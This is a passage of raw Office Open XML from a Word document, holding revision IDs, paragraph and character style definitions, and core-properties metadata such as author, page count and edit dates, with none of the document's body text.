    <w:rsid w:val="00CE27BC"/>
    <w:rsid w:val="00D04B6B"/>
    <w:rsid w:val="00D4165F"/>
    <w:rsid w:val="00D42828"/>
    <w:rsid w:val="00D5196F"/>
    <w:rsid w:val="00D71F53"/>
    <w:rsid w:val="00D757DA"/>
    <w:rsid w:val="00D86BE6"/>
    <w:rsid w:val="00DE209F"/>
    <w:rsid w:val="00E42BB1"/>
    <w:rsid w:val="00E45D14"/>
    <w:rsid w:val="00E533E8"/>
    <w:rsid w:val="00E67F7F"/>
    <w:rsid w:val="00E87A8B"/>
    <w:rsid w:val="00E916BA"/>
    <w:rsid w:val="00EB3555"/>
    <w:rsid w:val="00EB5CDF"/>
    <w:rsid w:val="00EF5203"/>
    <w:rsid w:val="00F1286A"/>
    <w:rsid w:val="00F42BCB"/>
    <w:rsid w:val="00F43DF8"/>
    <w:rsid w:val="00F57467"/>
    <w:rsid w:val="00FF7D6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E2BF4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{13E321F6-88D8-43C5-A4A8-D557E6644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20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E20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E209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E209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E209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E20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20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20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20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209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E20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E209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E209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E209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E20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20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20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209F"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00DE20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20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20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20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209F"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00DE209F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00DE209F"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00DE209F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00DE20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209F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00DE209F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="HTMLPreformatted">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTMLPreformattedChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C83026"/>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83026"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00283B1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1815</TotalTime>
  <Pages>10</Pages>
  <Words>686</Words>
  <Characters>3915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build ryuki</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>build ryuki</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-15T05:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-18T06:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>